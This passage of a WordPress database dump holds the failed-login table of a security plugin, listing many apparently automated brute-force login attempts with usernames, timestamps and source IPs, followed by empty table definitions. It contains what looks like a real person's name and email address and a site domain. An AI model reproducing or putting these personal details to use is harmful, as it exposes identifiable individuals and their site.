14:03:45','20.118.175.32'),(578856,0,'alexandrovich','2023-01-28 14:03:45','20.118.175.32'),(578857,0,'techvisor','2023-01-28 14:03:46','20.118.175.32'),(578858,0,'alexandrovich','2023-01-28 14:03:46','20.118.175.32'),(578859,0,'techvisor','2023-01-28 14:03:46','20.118.175.32'),(578860,0,'alexandrovich','2023-01-28 14:03:46','20.118.175.32'),(578861,0,'techvisor','2023-01-28 14:03:46','20.118.175.32'),(578862,0,'alexandrovich','2023-01-28 14:03:46','20.118.175.32'),(578863,0,'techvisor','2023-01-28 14:03:46','20.118.175.32'),(578864,0,'techvisor','2023-01-28 14:03:47','20.118.175.32'),(578865,0,'alexandrovich','2023-01-28 14:03:47','20.118.175.32'),(578866,0,'techvisor','2023-01-28 14:03:47','20.118.175.32'),(578867,0,'alexandrovich','2023-01-28 14:03:47','20.118.175.32'),(578868,0,'techvisor','2023-01-28 14:03:47','20.118.175.32'),(578869,0,'alexandrovich','2023-01-28 14:03:47','20.118.175.32'),(578870,0,'alexandrovich','2023-01-28 14:03:47','20.118.175.32'),(578871,0,'techvisor','2023-01-28 14:03:47','20.118.175.32'),(578872,0,'alexandrovich','2023-01-28 14:03:48','20.118.175.32'),(578873,0,'techvisor','2023-01-28 14:03:48','20.118.175.32'),(578874,0,'techvisor','2023-01-28 14:03:48','20.118.175.32'),(578875,0,'alexandrovich','2023-01-28 14:03:48','20.118.175.32'),(578876,0,'alexandrovich','2023-01-28 14:03:48','20.118.175.32'),(578877,0,'techvisor','2023-01-28 14:03:48','20.118.175.32'),(578878,0,'alexandrovich','2023-01-28 14:03:48','20.118.175.32'),(578879,0,'techvisor','2023-01-28 14:03:48','20.118.175.32'),(578880,0,'alexandrovich','2023-01-28 14:03:48','20.118.175.32'),(578881,0,'techvisor','2023-01-28 14:03:49','20.118.175.32'),(578882,0,'alexandrovich','2023-01-28 14:03:49','20.118.175.32'),(578883,0,'techvisor','2023-01-28 14:03:49','20.118.175.32'),(578884,0,'alexandrovich','2023-01-28 14:03:49','20.118.175.32'),(578885,0,'techvisor','2023-01-28 14:03:49','20.118.175.32'),(578886,0,'alexandrovich','2023-01-28 14:03:49','20.118.175.32'),(578887,0,'techvisor','2023-01-28 14:03:49','20.118.175.32'),(578888,0,'alexandrovich','2023-01-28 14:03:49','20.118.175.32'),(578889,0,'techvisor','2023-01-28 14:03:49','20.118.175.32'),(578890,0,'alexandrovich','2023-01-28 14:03:50','20.118.175.32'),(578891,0,'techvisor','2023-01-28 14:03:50','20.118.175.32'),(578892,0,'alexandrovich','2023-01-28 14:03:50','20.118.175.32'),(578893,0,'techvisor','2023-01-28 14:03:50','20.118.175.32'),(578894,0,'alexandrovich','2023-01-28 14:03:50','20.118.175.32'),(578895,0,'techvisor','2023-01-28 14:03:50','20.118.175.32'),(578896,0,'alexandrovich','2023-01-28 14:03:50','20.118.175.32'),(578897,0,'techvisor','2023-01-28 14:03:51','20.118.175.32'),(578898,0,'alexandrovich','2023-01-28 14:03:51','20.118.175.32'),(578899,0,'techvisor','2023-01-28 14:03:51','20.118.175.32'),(578900,0,'alexandrovich','2023-01-28 14:03:51','20.118.175.32'),(578901,0,'techvisor','2023-01-28 14:03:51','20.118.175.32'),(578902,0,'alexandrovich','2023-01-28 14:03:51','20.118.175.32'),(578903,0,'techvisor','2023-01-28 14:03:51','20.118.175.32'),(578904,0,'alexandrovich','2023-01-28 14:03:51','20.118.175.32'),(578905,0,'techvisor','2023-01-28 14:03:52','20.118.175.32'),(578906,0,'alexandrovich','2023-01-28 14:03:52','20.118.175.32'),(578907,0,'techvisor','2023-01-28 14:03:52','20.118.175.32'),(578908,0,'alexandrovich','2023-01-28 14:03:52','20.118.175.32'),(578909,0,'techvisor','2023-01-28 14:03:52','20.118.175.32'),(578910,0,'alexandrovich','2023-01-28 14:03:52','20.118.175.32'),(578911,0,'techvisor','2023-01-28 14:03:52','20.118.175.32'),(578912,0,'alexandrovich','2023-01-28 14:03:52','20.118.175.32'),(578913,0,'alexandrovich','2023-01-28 14:03:53','20.118.175.32'),(578914,0,'techvisor','2023-01-28 14:03:53','20.118.175.32'),(578915,0,'alexandrovich','2023-01-28 14:03:53','20.118.175.32'),(578916,0,'techvisor','2023-01-28 14:03:53','20.118.175.32'),(578917,0,'techvisor','2023-01-28 14:03:53','20.118.175.32'),(578918,0,'alexandrovich','2023-01-28 14:03:53','20.118.175.32'),(578919,0,'techvisor','2023-01-28 14:03:53','20.118.175.32'),(578920,0,'alexandrovich','2023-01-28 14:03:53','20.118.175.32'),(578921,0,'techvisor','2023-01-28 14:03:54','20.118.175.32'),(578922,0,'alexandrovich','2023-01-28 14:03:54','20.118.175.32'),(578923,0,'alexandrovich','2023-01-28 14:03:54','20.118.175.32'),(578924,0,'techvisor','2023-01-28 14:03:54','20.118.175.32'),(578925,0,'alexandrovich','2023-01-28 14:03:54','20.118.175.32'),(578926,0,'techvisor','2023-01-28 14:03:54','20.118.175.32'),(578927,0,'alexandrovich','2023-01-28 14:03:54','20.118.175.32'),(578928,0,'techvisor','2023-01-28 14:03:54','20.118.175.32'),(578929,0,'alexandrovich','2023-01-28 14:03:55','20.118.175.32'),(578930,0,'techvisor','2023-01-28 14:03:55','20.118.175.32'),(578931,0,'alexandrovich','2023-01-28 14:03:55','20.118.175.32'),(578932,0,'techvisor','2023-01-28 14:03:55','20.118.175.32'),(578933,0,'alexandrovich','2023-01-28 14:03:55','20.118.175.32'),(578934,0,'techvisor','2023-01-28 14:03:55','20.118.175.32'),(578935,0,'alexandrovich','2023-01-28 14:03:55','20.118.175.32'),(578936,0,'techvisor','2023-01-28 14:03:55','20.118.175.32'),(578937,0,'alexandrovich','2023-01-28 14:03:56','20.118.175.32'),(578938,0,'techvisor','2023-01-28 14:03:56','20.118.175.32'),(578939,0,'alexandrovich','2023-01-28 14:03:56','20.118.175.32'),(578940,0,'techvisor','2023-01-28 14:03:56','20.118.175.32'),(578941,0,'alexandrovich','2023-01-28 14:03:56','20.118.175.32'),(578942,0,'techvisor','2023-01-28 14:03:56','20.118.175.32'),(578943,0,'alexandrovich','2023-01-28 14:03:56','20.118.175.32'),(578944,0,'techvisor','2023-01-28 14:03:56','20.118.175.32'),(578945,0,'alexandrovich','2023-01-28 14:03:57','20.118.175.32'),(578946,0,'techvisor','2023-01-28 14:03:57','20.118.175.32'),(578947,0,'alexandrovich','2023-01-28 14:03:57','20.118.175.32'),(578948,0,'techvisor','2023-01-28 14:03:57','20.118.175.32'),(578949,0,'alexandrovich','2023-01-28 14:03:57','20.118.175.32'),(578950,0,'techvisor','2023-01-28 14:03:57','20.118.175.32'),(578951,0,'alexandrovich','2023-01-28 14:03:57','20.118.175.32'),(578952,0,'techvisor','2023-01-28 14:03:57','20.118.175.32'),(578953,0,'alexandrovich','2023-01-28 14:03:58','20.118.175.32'),(578954,0,'techvisor','2023-01-28 14:03:58','20.118.175.32'),(578955,0,'alexandrovich','2023-01-28 14:03:58','20.118.175.32'),(578956,0,'techvisor','2023-01-28 14:03:58','20.118.175.32'),(578957,0,'alexandrovich','2023-01-28 14:03:58','20.118.175.32'),(578958,0,'techvisor','2023-01-28 14:03:58','20.118.175.32'),(578959,0,'alexandrovich','2023-01-28 14:03:58','20.118.175.32'),(578960,0,'techvisor','2023-01-28 14:03:58','20.118.175.32'),(578961,0,'alexandrovich','2023-01-28 14:03:58','20.118.175.32'),(578962,0,'techvisor','2023-01-28 14:03:59','20.118.175.32'),(578963,0,'alexandrovich','2023-01-28 14:03:59','20.118.175.32'),(578964,0,'techvisor','2023-01-28 14:03:59','20.118.175.32'),(578965,0,'alexandrovich','2023-01-28 14:03:59','20.118.175.32'),(578966,0,'techvisor','2023-01-28 14:03:59','20.118.175.32'),(578967,0,'alexandrovich','2023-01-28 14:03:59','20.118.175.32'),(578968,0,'techvisor','2023-01-28 14:03:59','20.118.175.32'),(578969,0,'alexandrovich','2023-01-28 14:03:59','20.118.175.32'),(578970,0,'techvisor','2023-01-28 14:04:00','20.118.175.32'),(578971,0,'alexandrovich','2023-01-28 14:04:00','20.118.175.32'),(578972,0,'techvisor','2023-01-28 14:04:00','20.118.175.32'),(578973,0,'alexandrovich','2023-01-28 14:04:00','20.118.175.32'),(578974,0,'techvisor','2023-01-28 14:04:00','20.118.175.32'),(578975,0,'alexandrovich','2023-01-28 14:04:00','20.118.175.32'),(578976,0,'alexandrovich','2023-01-28 14:04:00','20.118.175.32'),(578977,0,'techvisor','2023-01-28 14:04:00','20.118.175.32'),(578978,0,'alexandrovich','2023-01-28 14:04:01','20.118.175.32'),(578979,0,'techvisor','2023-01-28 14:04:01','20.118.175.32'),(578980,0,'alexandrovich','2023-01-28 14:04:01','20.118.175.32'),(578981,0,'techvisor','2023-01-28 14:04:01','20.118.175.32'),(578982,0,'alexandrovich','2023-01-28 14:04:01','20.118.175.32'),(578983,0,'techvisor','2023-01-28 14:04:01','20.118.175.32'),(578984,0,'alexandrovich','2023-01-28 14:04:01','20.118.175.32'),(578985,0,'techvisor','2023-01-28 14:04:01','20.118.175.32'),(578986,0,'alexandrovich','2023-01-28 14:04:01','20.118.175.32'),(578987,0,'techvisor','2023-01-28 14:04:01','20.118.175.32'),(578988,0,'alexandrovich','2023-01-28 14:04:02','20.118.175.32'),(578989,0,'techvisor','2023-01-28 14:04:02','20.118.175.32'),(578990,0,'alexandrovich','2023-01-28 14:04:02','20.118.175.32'),(578991,0,'techvisor','2023-01-28 14:04:02','20.118.175.32'),(578992,0,'alexandrovich','2023-01-28 14:04:02','20.118.175.32'),(578993,0,'techvisor','2023-01-28 14:04:02','20.118.175.32'),(578994,0,'alexandrovich','2023-01-28 14:04:02','20.118.175.32'),(578995,0,'techvisor','2023-01-28 14:04:02','20.118.175.32'),(578996,0,'alexandrovich','2023-01-28 14:04:03','20.118.175.32'),(578997,0,'techvisor','2023-01-28 14:04:03','20.118.175.32'),(578998,0,'alexandrovich','2023-01-28 14:04:03','20.118.175.32'),(578999,0,'techvisor','2023-01-28 14:04:03','20.118.175.32'),(579000,0,'alexandrovich','2023-01-28 14:04:03','20.118.175.32'),(579001,0,'techvisor','2023-01-28 14:04:03','20.118.175.32'),(579002,0,'alexandrovich','2023-01-28 14:04:03','20.118.175.32'),(579003,0,'techvisor','2023-01-28 14:04:03','20.118.175.32'),(579004,0,'alexandrovich','2023-01-28 14:04:04','20.118.175.32'),(579005,0,'techvisor','2023-01-28 14:04:04','20.118.175.32'),(579006,0,'alexandrovich','2023-01-28 14:04:04','20.118.175.32'),(579007,0,'techvisor','2023-01-28 14:04:04','20.118.175.32'),(579008,0,'techvisor','2023-01-28 14:04:04','20.118.175.32'),(579009,0,'alexandrovich','2023-01-28 14:04:04','20.118.175.32'),(579010,0,'alexandrovich','2023-01-28 14:04:05','20.118.175.32'),(579011,0,'techvisor','2023-01-28 14:04:05','20.118.175.32'),(579012,0,'alexandrovich','2023-01-28 14:04:05','20.118.175.32'),(579013,0,'techvisor','2023-01-28 14:04:05','20.118.175.32'),(579014,0,'alexandrovich','2023-01-28 14:04:05','20.118.175.32'),(579015,0,'techvisor','2023-01-28 14:04:06','20.118.175.32'),(579016,0,'alexandrovich','2023-01-28 14:04:06','20.118.175.32'),(579017,0,'techvisor','2023-01-28 14:04:06','20.118.175.32'),(579018,0,'techvisor','2023-01-28 14:04:06','20.118.175.32'),(579019,0,'alexandrovich','2023-01-28 14:04:06','20.118.175.32'),(579020,0,'techvisor','2023-01-28 14:04:06','20.118.175.32'),(579021,0,'alexandrovich','2023-01-28 14:04:06','20.118.175.32'),(579022,0,'techvisor','2023-01-28 14:04:07','20.118.175.32'),(579023,0,'alexandrovich','2023-01-28 14:04:07','20.118.175.32'),(579024,0,'techvisor','2023-01-28 14:04:07','20.118.175.32'),(579025,0,'alexandrovich','2023-01-28 14:04:07','20.118.175.32'),(579026,0,'techvisor','2023-01-28 14:04:07','20.118.175.32'),(579027,0,'alexandrovich','2023-01-28 14:04:07','20.118.175.32'),(579028,0,'techvisor','2023-01-28 14:04:07','20.118.175.32'),(579029,0,'alexandrovich','2023-01-28 14:04:07','20.118.175.32'),(579030,0,'techvisor','2023-01-28 14:04:08','20.118.175.32'),(579031,0,'alexandrovich','2023-01-28 14:04:08','20.118.175.32'),(579032,0,'techvisor','2023-01-28 14:04:08','20.118.175.32'),(579033,0,'alexandrovich','2023-01-28 14:04:08','20.118.175.32'),(579034,0,'techvisor','2023-01-28 14:04:08','20.118.175.32'),(579035,0,'alexandrovich','2023-01-28 14:04:08','20.118.175.32'),(579036,0,'techvisor','2023-01-28 14:04:08','20.118.175.32'),(579037,0,'alexandrovich','2023-01-28 14:04:08','20.118.175.32'),(579038,0,'techvisor','2023-01-28 14:04:09','20.118.175.32'),(579039,0,'alexandrovich','2023-01-28 14:04:09','20.118.175.32'),(579040,0,'techvisor','2023-01-28 14:04:09','20.118.175.32'),(579041,0,'alexandrovich','2023-01-28 14:04:09','20.118.175.32'),(579042,0,'techvisor','2023-01-28 14:04:09','20.118.175.32'),(579043,0,'alexandrovich','2023-01-28 14:04:09','20.118.175.32'),(579044,0,'techvisor','2023-01-28 14:04:09','20.118.175.32'),(579045,0,'alexandrovich','2023-01-28 14:04:09','20.118.175.32'),(579046,0,'techvisor','2023-01-28 14:04:10','20.118.175.32'),(579047,0,'alexandrovich','2023-01-28 14:04:10','20.118.175.32'),(579048,0,'techvisor','2023-01-28 14:04:10','20.118.175.32'),(579049,0,'alexandrovich','2023-01-28 14:04:10','20.118.175.32'),(579050,0,'techvisor','2023-01-28 14:04:10','20.118.175.32'),(579051,0,'alexandrovich','2023-01-28 14:04:10','20.118.175.32'),(579052,0,'techvisor','2023-01-28 14:04:10','20.118.175.32'),(579053,0,'alexandrovich','2023-01-28 14:04:10','20.118.175.32'),(579054,0,'techvisor','2023-01-28 14:04:11','20.118.175.32'),(579055,0,'alexandrovich','2023-01-28 14:04:11','20.118.175.32'),(579056,0,'alexandrovich','2023-01-28 14:04:11','20.118.175.32'),(579057,0,'alexandrovich','2023-01-28 14:04:11','20.118.175.32'),(579058,0,'alexandrovich','2023-01-28 14:04:11','20.118.175.32'),(579059,0,'feed','2023-01-28 14:23:32','93.114.185.76'),(579060,0,'admin','2023-01-28 15:12:58','103.146.203.15'),(579061,0,'admin','2023-01-28 15:37:12','207.180.230.207'),(579062,0,'admin','2023-01-28 15:49:38','103.18.6.65'),(579063,0,'admin','2023-01-28 16:27:25','185.119.81.96'),(579064,0,'feed','2023-01-28 17:08:17','159.65.200.228'),(579065,0,'common','2023-01-28 17:17:36','185.119.81.108'),(579066,0,'admin','2023-01-28 17:41:01','185.119.81.96'),(579067,0,'feed','2023-01-28 18:09:36','177.55.124.62'),(579068,0,'dogstardesign','2023-01-28 18:23:29','95.217.178.185'),(579069,0,'feed','2023-01-28 19:03:59','213.175.66.138'),(579070,0,'feed','2023-01-28 19:55:34','206.189.129.168'),(579071,0,'London','2023-01-28 20:36:40','185.119.81.105'),(579072,0,'admin','2023-01-28 20:38:12','45.252.251.45'),(579073,0,'precise','2023-01-28 20:38:42','185.119.81.109'),(579074,0,'feed','2023-01-28 20:46:11','159.203.143.36'),(579075,0,'feed','2023-01-28 21:37:04','124.153.66.86'),(579076,0,'feed','2023-01-28 22:22:24','185.2.4.56'),(579077,0,'admin','2023-01-28 22:45:33','185.119.81.96'),(579078,0,'feed','2023-01-28 23:07:45','166.62.103.104'),(579079,0,'malpractices','2023-01-28 23:38:22','185.119.81.99'),(579080,0,'admin','2023-01-28 23:44:46','157.245.200.155'),(579081,0,'feed','2023-01-28 23:54:43','5.188.62.174'),(579082,0,'feed','2023-01-28 23:57:45','149.255.63.242'),(579083,0,'dogstardesign','2023-01-29 00:09:29','47.88.22.184'),(579084,0,'admin','2023-01-29 01:14:26','185.119.81.105'),(579085,0,'admin','2023-01-29 01:47:12','150.109.148.216'),(579086,0,'admin','2023-01-29 01:49:38','103.18.6.65'),(579087,0,'common','2023-01-29 01:50:09','185.119.81.108'),(579088,0,'precise','2023-01-29 02:02:59','185.119.81.109'),(579089,0,'admin','2023-01-29 02:23:06','103.18.6.65'),(579090,0,'dogstardesign','2023-01-29 02:31:52','46.101.179.205'),(579091,0,'admin','2023-01-29 02:42:53','61.219.43.253'),(579092,0,'admin','2023-01-29 03:05:47','185.231.115.134'),(579093,0,'admin','2023-01-29 04:26:02','185.119.81.99'),(579094,0,'dogstardesign','2023-01-29 05:16:21','45.84.1.94'),(579095,0,'stard','2023-01-29 05:23:34','185.119.81.99'),(579096,0,'dogstardesign','2023-01-29 06:20:25','103.72.163.9'),(579097,0,'dogstardesign','2023-01-29 06:22:07','47.88.22.184'),(579098,0,'admin','2023-01-29 06:41:02','185.119.81.105'),(579099,0,'feed','2023-01-29 06:46:47','46.101.150.34'),(579100,0,'admin','2023-01-29 07:09:15','185.119.81.109'),(579101,0,'London','2023-01-29 07:22:08','185.119.81.105'),(579102,0,'admin','2023-01-29 08:20:05','185.119.81.99'),(579103,0,'feed','2023-01-29 08:56:22','171.244.0.91'),(579104,0,'feed','2023-01-29 09:59:51','34.143.243.10'),(579105,0,'dogstardesign','2023-01-29 10:10:35','34.87.94.148'),(579106,0,'feed','2023-01-29 10:52:23','45.55.79.147'),(579107,0,'admin','2023-01-29 11:18:47','103.200.23.139'),(579108,0,'dogstardesign','2023-01-29 11:27:55','167.86.100.73'),(579109,0,'feed','2023-01-29 11:41:30','46.101.150.34'),(579110,0,'dogstardesign','2023-01-29 13:56:32','15.235.142.129'),(579111,0,'feed','2023-01-29 14:19:41','43.242.214.140'),(579112,0,'feed','2023-01-29 15:11:59','124.153.66.86'),(579113,0,'feed','2023-01-29 16:07:41','212.192.24.22'),(579114,0,'feed','2023-01-29 17:01:18','157.245.55.196'),(579115,0,'feed','2023-01-29 17:48:22','164.92.120.240'),(579116,0,'feed','2023-01-29 18:34:20','46.105.29.21'),(579117,0,'London','2023-01-29 19:35:55','185.119.81.105'),(579118,0,'dogstardesign','2023-01-29 20:14:44','137.116.141.77'),(579119,0,'dogstardesign','2023-01-29 20:54:40','51.210.150.127'),(579120,0,'admin','2023-01-29 20:58:17','185.119.81.109'),(579121,0,'dogstardesign','2023-01-29 21:27:27','51.210.150.127'),(579122,0,'feed','2023-01-29 21:32:01','23.97.205.210'),(579123,0,'admin','2023-01-29 21:50:57','185.119.81.100'),(579124,0,'feed','2023-01-29 22:07:24','199.167.131.50'),(579125,0,'admin','2023-01-29 22:19:48','103.153.3.21'),(579126,0,'feed','2023-01-29 22:43:54','212.110.92.155'),(579127,0,'admin','2023-01-29 22:58:27','185.119.81.99'),(579128,0,'feed','2023-01-29 23:24:35','64.227.6.141'),(579129,0,'admin','2023-01-30 00:05:42','103.74.123.3'),(579130,0,'feed','2023-01-30 00:10:51','64.227.6.141'),(579131,0,'feed','2023-01-30 01:55:40','213.175.66.138'),(579132,0,'feed','2023-01-30 02:51:57','80.88.88.149'),(579133,0,'feed','2023-01-30 03:53:51','188.166.236.35'),(579134,0,'dogstardesign','2023-01-30 03:58:55','203.205.52.183'),(579135,0,'admin','2023-01-30 04:26:29','188.34.187.187'),(579136,0,'dogstardesign','2023-01-30 04:40:53','143.244.132.153'),(579137,0,'admin','2023-01-30 04:44:16','5.75.254.29'),(579138,0,'admin','2023-01-30 04:48:48','185.124.9.7'),(579139,0,'feed','2023-01-30 04:51:12','188.166.225.235'),(579140,0,'admin','2023-01-30 04:53:24','31.31.196.102'),(579141,0,'admin','2023-01-30 05:02:38','159.69.189.243'),(579142,0,'admin','2023-01-30 05:20:48','167.235.204.184'),(579143,0,'admin','2023-01-30 05:38:59','116.203.119.56'),(579144,0,'feed','2023-01-30 05:43:52','193.111.73.167'),(579145,0,'admin','2023-01-30 05:57:04','188.34.180.32'),(579146,0,'admin','2023-01-30 06:15:07','188.34.187.187'),(579147,0,'admin','2023-01-30 06:33:15','5.75.254.29'),(579148,0,'feed','2023-01-30 06:34:58','43.154.9.162'),(579149,0,'above','2023-01-30 07:09:16','185.119.81.100'),(579150,0,'feed','2023-01-30 07:40:47','34.69.109.132'),(579151,0,'feed','2023-01-30 08:49:57','213.175.66.138'),(579152,0,'admin','2023-01-30 09:24:52','45.85.146.176'),(579153,0,'admin','2023-01-30 09:48:01','82.200.235.138'),(579154,0,'admin','2023-01-30 10:00:18','164.90.170.66'),(579155,0,'admin','2023-01-30 11:42:49','67.205.132.31'),(579156,0,'admin','2023-01-30 11:49:40','103.130.219.238'),(579157,0,'feed','2023-01-30 11:56:11','167.99.127.239'),(579158,0,'admin','2023-01-30 12:55:05','185.119.81.105'),(579159,0,'feed','2023-01-30 12:58:21','181.174.125.214'),(579160,0,'dogstardesign','2023-01-30 13:23:07','178.62.60.116'),(579161,0,'feed','2023-01-30 14:03:17','35.224.178.6'),(579162,0,'wadminw','2023-01-30 14:59:17','172.104.81.115'),(579163,0,'feed','2023-01-30 15:00:57','167.99.127.239'),(579164,0,'feed','2023-01-30 15:36:27','109.168.97.89'),(579165,0,'wwwadmin','2023-01-30 15:36:44','208.109.9.36'),(579166,0,'stard','2023-01-30 15:40:07','185.119.81.99'),(579167,0,'admin','2023-01-30 16:22:20','103.211.219.62'),(579168,0,'feed','2023-01-30 16:42:06','106.52.120.186'),(579169,0,'admin','2023-01-30 17:06:23','185.119.81.100'),(579170,0,'dogstardesign','2023-01-30 17:07:50','192.241.135.47'),(579171,0,'feed','2023-01-30 17:37:21','209.97.162.248'),(579172,0,'feed','2023-01-30 18:32:42','145.239.30.120'),(579173,0,'dogstardesign','2023-01-30 18:36:10','103.200.23.139'),(579174,0,'admin','2023-01-30 19:27:38','103.92.235.55'),(579175,0,'dogstardesign','2023-01-30 19:32:00','69.55.54.119'),(579176,0,'feed','2023-01-30 20:06:52','47.242.124.78'),(579177,0,'feed','2023-01-30 20:49:39','207.154.250.8'),(579178,0,'admin','2023-01-30 22:13:53','185.119.81.99'),(579179,0,'feed','2023-01-30 22:18:11','207.154.248.39'),(579180,0,'dogstardesign','2023-01-30 22:30:38','103.74.121.5'),(579181,0,'feed','2023-01-30 22:56:36','47.110.72.238'),(579182,0,'admin','2023-01-30 23:15:31','217.13.219.167'),(579183,0,'feed','2023-01-30 23:37:12','145.239.30.120'),(579184,0,'feed','2023-01-31 00:16:42','206.189.129.168'),(579185,0,'feed','2023-01-31 00:55:54','93.114.185.76'),(579186,0,'malpractices','2023-01-31 01:18:51','185.119.81.99'),(579187,0,'malpractices','2023-01-31 01:36:53','185.119.81.99'),(579188,0,'admin','2023-01-31 01:41:46','185.119.81.99'),(579189,0,'dogstardesign','2023-01-31 01:47:00','34.87.94.148'),(579190,0,'admin','2023-01-31 02:14:22','103.146.203.123'),(579191,0,'feed','2023-01-31 02:16:54','47.115.24.165'),(579192,0,'admin','2023-01-31 02:25:32','207.180.230.207'),(579193,0,'dogstardesign','2023-01-31 03:15:12','5.101.156.210'),(579194,0,'precise','2023-01-31 03:22:09','185.119.81.109'),(579195,0,'admin','2023-01-31 03:53:20','167.71.229.255'),(579196,0,'feed','2023-01-31 04:07:19','188.166.225.235'),(579197,0,'feed','2023-01-31 04:59:49','95.97.6.138'),(579198,0,'stard','2023-01-31 05:31:26','185.119.81.99'),(579199,0,'feed','2023-01-31 05:44:05','142.93.203.156'),(579200,0,'admin','2023-01-31 05:54:33','185.119.81.109'),(579201,0,'wadminw','2023-01-31 06:29:25','50.87.144.176'),(579202,0,'wwwadmin','2023-01-31 06:41:24','192.185.4.72'),(579203,0,'feed','2023-01-31 07:09:44','148.72.214.194'),(579204,0,'feed','2023-01-31 07:59:56','148.72.214.194'),(579205,0,'feed','2023-01-31 08:53:27','103.129.222.91'),(579206,0,'feed','2023-01-31 09:48:17','91.201.215.19'),(579207,0,'feed','2023-01-31 10:36:52','159.223.168.91'),(579208,0,'admin','2023-01-31 12:00:18','185.119.81.99'),(579209,0,'admin','2023-01-31 12:04:12','143.244.132.153'),(579210,0,'feed','2023-01-31 12:06:28','209.97.162.248'),(579211,0,'feed','2023-01-31 12:51:12','103.130.218.178'),(579212,0,'admin','2023-01-31 12:53:10','103.70.125.155'),(579213,0,'simon.davies','2023-01-31 12:53:19','103.70.125.155'),(579214,0,'user','2023-01-31 12:53:27','103.70.125.155'),(579215,0,'root','2023-01-31 12:53:36','103.70.125.155'),(579216,0,'simon.davies@dogstardesign.co.uk','2023-01-31 12:53:43','103.70.125.155'),(579217,0,'dogstardesign.co.uk','2023-01-31 12:53:50','103.70.125.155'),(579218,0,'administrator','2023-01-31 12:53:57','103.70.125.155'),(579219,0,'dogstardesign','2023-01-31 13:25:38','103.74.121.5'),(579220,0,'feed','2023-01-31 13:41:13','106.15.38.206'),(579221,0,'feed','2023-01-31 14:14:12','35.224.178.6'),(579222,0,'feed','2023-01-31 14:41:14','103.179.56.32'),(579223,0,'feed','2023-01-31 15:48:01','69.163.186.158'),(579224,0,'dogstardesign','2023-01-31 15:55:30','103.153.3.21'),(579225,0,'feed','2023-01-31 17:36:29','157.245.70.172'),(579226,0,'feed','2023-01-31 18:12:34','51.91.151.60'),(579227,0,'feed','2023-01-31 18:45:40','171.244.0.91'),(579228,0,'dogstardesign','2023-01-31 18:58:39','120.132.99.49'),(579229,0,'admin','2023-01-31 19:18:23','137.116.141.77'),(579230,0,'feed','2023-01-31 19:19:42','178.217.190.82'),(579231,0,'dogstardesign','2023-01-31 19:26:45','185.25.117.82'),(579232,0,'dogstardesign','2023-01-31 19:50:39','146.59.154.210'),(579233,0,'feed','2023-01-31 19:52:56','195.154.184.235'),(579234,0,'admin','2023-01-31 20:16:42','178.208.67.56'),(579235,0,'feed','2023-01-31 20:26:16','157.245.70.172'),(579236,0,'admin','2023-01-31 20:58:26','177.55.125.120'),(579237,0,'feed','2023-01-31 20:59:46','45.55.79.147'),(579238,0,'feed','2023-01-31 21:33:59','51.255.81.60'),(579239,0,'feed','2023-01-31 22:06:08','157.245.55.196'),(579240,0,'feed','2023-01-31 22:32:50','66.33.193.231'),(579241,0,'feed','2023-01-31 23:04:56','192.71.144.12'),(579242,0,'feed','2023-01-31 23:34:47','80.88.88.149'),(579243,0,'dogstardesign','2023-01-31 23:41:51','103.129.222.7');
/*!40000 ALTER TABLE `wp_aiowps_failed_logins` ENABLE KEYS */;
UNLOCK TABLES;
--
-- Table structure for table `wp_aiowps_global_meta`
--
DROP TABLE IF EXISTS `wp_aiowps_global_meta`;
/*!40101 SET @saved_cs_client = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `wp_aiowps_global_meta` (
`meta_id` bigint(20) NOT NULL AUTO_INCREMENT,
`date_time` datetime NOT NULL DEFAULT '1000-10-10 10:00:00',
`meta_key1` varchar(255) NOT NULL,
`meta_key2` varchar(255) NOT NULL,
`meta_key3` varchar(255) NOT NULL,
`meta_key4` varchar(255) NOT NULL,
`meta_key5` varchar(255) NOT NULL,
`meta_value1` varchar(255) NOT NULL,
`meta_value2` text NOT NULL,
`meta_value3` text NOT NULL,
`meta_value4` longtext NOT NULL,
`meta_value5` longtext NOT NULL,
PRIMARY KEY (`meta_id`)
) ENGINE=InnoDB DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_ci;
/*!40101 SET character_set_client = @saved_cs_client */;
--
-- Dumping data for table `wp_aiowps_global_meta`
--
LOCK TABLES `wp_aiowps_global_meta` WRITE;
/*!40000 ALTER TABLE `wp_aiowps_global_meta` DISABLE KEYS */;
/*!40000 ALTER TABLE `wp_aiowps_global_meta` ENABLE KEYS */;
UNLOCK TABLES;
--
-- Table structure for table `wp_aiowps_login_activity`
--
DROP TABLE IF EXISTS `wp_aiowps_login_activity`;
/*!40101 SET @saved_cs_client = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `wp_aiowps_login_activity` (
`id` bigint(20) NOT NULL AUTO_INCREMENT,
`user_id` bigint(20) NOT NULL,
`user_login` varchar(150) NOT NULL,
`login_date` datetime NOT NULL DEFAULT '1000-10-10 10:00:00',
`logout_date` datetime NOT NULL DEFAULT '1000-10-10 10:00:00',
`login_ip` varchar(100) NOT NULL DEFAULT '',
`login_country` varchar(150) NOT NULL DEFAULT '',
`browser_type` varchar(150) NOT NULL DEFAULT '',
PRIMARY KEY (`id`)
) ENGINE=InnoDB DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_ci;
/*!40101 SET character_set_client = @saved_cs_client */;
--
-- Dumping data for table `wp_aiowps_login_activity`
--
LOCK TABLES `wp_aiowps_login_activity` WRITE;
/*!40000 ALTER TABLE `wp_aiowps_login_activity` DISABLE KEYS */;
/*!40000 ALTER TABLE `wp_aiowps_login_activity` ENABLE KEYS */;
UNLOCK TABLES;
--
-- Table structure for table `wp_aiowps_login_lockdown`
--
DROP TABLE IF EXISTS `wp_aiowps_login_lockdown`;
/*!40101 SET @saved_cs_client = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `wp_aiowps_login_lockdown` (
`id` bigint(20) NOT NULL AUTO_INCREMENT,
`user_id` bigint(20) NOT NULL,
`user_login` varchar(150) NOT NULL,
`lockdown_date` datetime NOT NULL DEFAULT '1000-10-10 10:00:00',
`release_date` datetime NOT NULL DEFAULT '1000-10-10 10:00:00',
`failed_login_ip` varchar(100) NOT NULL DEFAULT '',
`lock_reason` varchar(128) NOT NULL DEFAULT '',
`unlock_key` varchar(128) NOT NULL DEFAULT '',
PRIMARY KEY (`id`)
) ENGINE=InnoDB DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_ci;
/*!40101 SET character_set_client = @saved_cs_client */;
--
-- Dumping data for table `wp_aiowps_login_lockdown`
--
LOCK TABLES `wp_aiowps_login_lockdown` WRITE;
